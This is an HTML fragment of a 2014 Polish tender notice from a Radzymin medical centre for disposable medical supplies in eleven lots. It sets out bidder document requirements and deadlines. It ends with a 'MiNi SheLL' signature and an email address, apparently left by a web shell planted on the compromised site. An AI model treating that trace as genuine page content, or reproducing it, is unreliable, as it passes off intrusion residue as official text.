<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokumenty dopuszczające do obrotu i używania zgodnie z Ustawą z 20 maja 2010r. o wyrobach medycznych, Dz. U. z 2010r  Nr 107, poz. 679 z dn. 17.06.2010r.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzzoz-radzymin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Medyczne im. Bitwy Warszawskiej 1920 r. w Radzyminie - SPZZOZ
ul. Konstytucji 3 Maja 17	05-250 Radzymin, budynek przychodni  II piętro pok. 221..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2014 godzina 10:30, miejsce: Centrum Medyczne im. Bitwy Warszawskiej 1920 r. w Radzyminie - SPZZOZ
ul. Konstytucji 3 Maja 17	05-250 Radzymin, budynek przychodni  II piętro pok. 221..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 05.09.2014.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Materiały medyczne i sprzęt jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szczoteczki cytologiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Materiały i sprzęt jednorazowego użytku strzykawki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Sprzęt jednorazowego użytku cewniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Sprzęt jednorazowego użytku igły.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Sprzęt jednorazowego użytku rękawice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Materiały opatrunkowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Przyrządy do infuzji   
1	Przyrząd do przetaczania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.41.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Elektrody do EKG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.71.11.40-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Sprzęt jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Materiały opatrunkowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com